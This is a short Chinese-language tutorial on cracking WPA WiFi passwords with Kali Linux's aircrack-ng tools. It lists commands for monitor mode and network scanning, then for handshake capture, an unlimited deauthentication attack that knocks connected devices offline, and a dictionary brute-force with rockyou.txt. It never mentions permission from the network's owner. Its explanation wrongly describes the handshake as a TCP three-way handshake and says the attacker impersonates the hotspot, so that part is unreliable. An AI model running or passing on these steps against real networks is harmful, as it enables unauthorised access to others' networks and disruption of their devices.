kali linux 破解WiFi

一、ifconfig查看网卡信息，有wlan0表示有WiFi设备（若找不到自行百度解决问题）

 

二、 命令airmon-ng查看网卡是否支持监听模式

 

 

三、开启监听模式

airmon-ng start wlan0

执行成功后wlan0变成wlan0mon

四、查看附近网络

airodump-ng wlan0mon

五、抓取握手包

airodump-ng --bssid WiFi的BSSID -c 信道频率 -w 抓包存储的路径 wlan0mon

若抓不到数据，可以攻击已经连接的设备使其掉线，设备会再自动连接，并发这个自动连接过程会进行三次握手，会发送tcp包（里面包含加密的密码数据），我方伪装成WiFi热点去窃取该数据包。我方窃取后即可用字典穷举法暴力破解加密的WiFi密码。（数据包里面的密码是哈希加密的，哈希加密只能正向)

aireplay-ng -0 0 -c 连接到WiFi的设备mac地址 -a bssid 网卡名（一般为wlan0mon）

此处-0 代表WiFi设备无限次数,8则代表攻击8次

如果成功，会出现“WPA handshake：bssid",如图：

 

六、字典爆破

aircrack-ng -w 字典路径 握手包路径

字典自己找，握手包路径看第五步存储的位置，文件后缀名为.cap。

例：

aircrack-ng -w /usr/share/wordlists/rockyou.txt /home/wifi-01.cap